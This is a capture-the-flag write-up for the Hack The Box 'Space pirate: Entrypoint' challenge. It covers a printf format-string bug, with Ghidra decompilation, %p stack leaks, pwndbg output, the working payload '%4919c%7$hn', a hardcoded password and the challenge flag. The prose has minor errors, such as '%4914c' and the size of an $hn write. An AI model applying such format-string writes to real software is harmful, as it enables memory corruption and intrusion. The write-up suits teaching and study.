Space pirate: Entrypoint
A standard FSB challenge
Initial Impressions
We are given a 64-bit binary file that upon running gives us two options.
โโโ(kaliใฟkali)-[~/Desktop/CTF/PWN/htb_spacepirate_entrypoint]
โโ$ ./sp_entrypoint
Authentication System
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโ โ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโ โโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโโโโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโ โโโโโ โโโ โโโ โโโ โโโโโโโโโโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโ โโโ โโโโโ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโ โโ โโโ โโโโโ โโโ โโโ โโโ โโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโ โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ โโโโโโโโโ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
1. Scan card ๐ณ
2. Insert password โช๏ธ
>
Looking at the decompiled main function in Ghidra, it gives us two functions of interest, open_door and check_pass.
main
undefined8 main(void)
{
long lVar1;
long in_FS_OFFSET;
long local_48;
long *local_40;
char local_38 [40];
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
setup();
banner();
local_48 = 0xdeadbeef;
local_40 = &local_48;
printf(&DAT_001025e0);
lVar1 = read_num();
if (lVar1 != 1) {
if (lVar1 == 2) {
check_pass();
}
printf(&DAT_00102668,&DAT_0010259a);
/* WARNING: Subroutine does not return */
exit(0x1b39);
}
printf("\n[!] Scanning card.. Something is wrong!\n\nInsert card\'s serial number: ");
read(0,local_38,0x1f);
printf("\nYour card is: ");
printf(local_38);
if (local_48 == 0xdead1337) {
open_door();
}
else {
printf(&DAT_001026a0,&DAT_0010259a);
}
if (local_10 == *(long *)(in_FS_OFFSET + 0x28)) {
return 0;
}
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}The open_door() function prints out the flag to us while the check_pass() authenticates us if our input is 0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455.
check_pass
void check_pass(void)
{
int iVar1;
long in_FS_OFFSET;
undefined8 local_28;
undefined8 local_20;
long local_10;
local_10 = *(long *)(in_FS_OFFSET + 0x28);
local_28 = 0;
local_20 = 0;
printf("[*] Insert password: ");
read(0,&local_28,0xf);
iVar1 = strncmp("0nlyTh30r1g1n4lCr3wM3mb3r5C4nP455",(char *)&local_28,0x21);
if (iVar1 != 0) {
printf(&DAT_001025a8,&DAT_0010259a);
/* WARNING: Subroutine does not return */
exit(0x1b39);
}
open_door();
if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}However, that is impossible as the input is only accepting 15 bytes of input (Oxf).
Looking back at the main function, we see a possible FSB vulnerability on line 27 and 29 where our input is being displayed directly with printf.
This can be easily tested with %p which leaks a value of the stack.
1. Scan card ๐ณ
2. Insert password โช๏ธ
> 1
[!] Scanning card.. Something is wrong!
Insert card's serial number: %p
Your card is: 0x7ffde61a8660We can also see that the variable declared earlier local_48 is on the stack 0xdeadbeef.
Exploit
To successfully get the flag, we need to
Leak the location of the pointer to
local_48on the stackOverwrite the contents of
local_48to be equivalent0xdead1337to pass the check
Using %p.%p.%p.%p.%p.%p.%p, we can see that local_48 is on the 6th position on the stack.
Insert card's serial number: %p.%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7ffde61a8660.0x7fab257ed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7ffde61aad00.0x70252e70252e7025With the use of pwndbg, we can see that the pointer to local_48 is on the 7th position on the stack 0x7fffffffdc68 pointing to 0x7fffffffdc60.
00:0000โ rsp 0x7fffffffdc58 โโธ 0x555555400d78 (main+130) โโ lea rdi, [rip + 0x18d9]
01:0008โ 0x7fffffffdc60 โโ 0xdeadbeef
02:0010โ 0x7fffffffdc68 โโธ 0x7fffffffdc60 โโ 0xdeadbeef
03:0018โ rsi 0x7fffffffdc70 โโธ 0x7ffff7c10b40 โโ push rbp
04:0020โ 0x7fffffffdc78 โโ 0x0
05:0028โ 0x7fffffffdc80 โโธ 0x555555400e20 (__libc_csu_init) โโ push r15
06:0030โ 0x7fffffffdc88 โโธ 0x555555400940 (_start) โโ xor ebp, ebp
07:0038โ 0x7fffffffdc90 โโธ 0x7fffffffdd80 โโ 0x1pwndbg> continue
Continuing.
%p.%p.%p.%p.%p.%p.%p
Your card is: 0x7fffffffb5c0.0x7ffff7bed8c0.(nil).0xf.0x21676e6f72772073.0xdeadbeef.0x7fffffffdc60We can then $hn to overwrite the last word (4 bytes) of 0xdeadbeef with %4914c which translates to 1337 in decimal., making local_48 = 0xdead1337.
The %n specifier takes in a pointer (memory address) and writes there the number of characters written so far. If we can control the input, we can control how many characters are written and also where we write to.
This makes our final payload %4919c%7$hn, with %7 referring to the pointer to local_48 and $hn referring to the beef portion of 0xdeadbeef which we are trying to overwrite.
Insert card's serial number: %4919c%7$hn
Your card is: ๏ฟฝ
[+] Door opened, you can proceed with the passphrase: HTB{g4t3_0n3_d4rkn3e55_th3_w0rld_0f_p1r4t35}
Last updated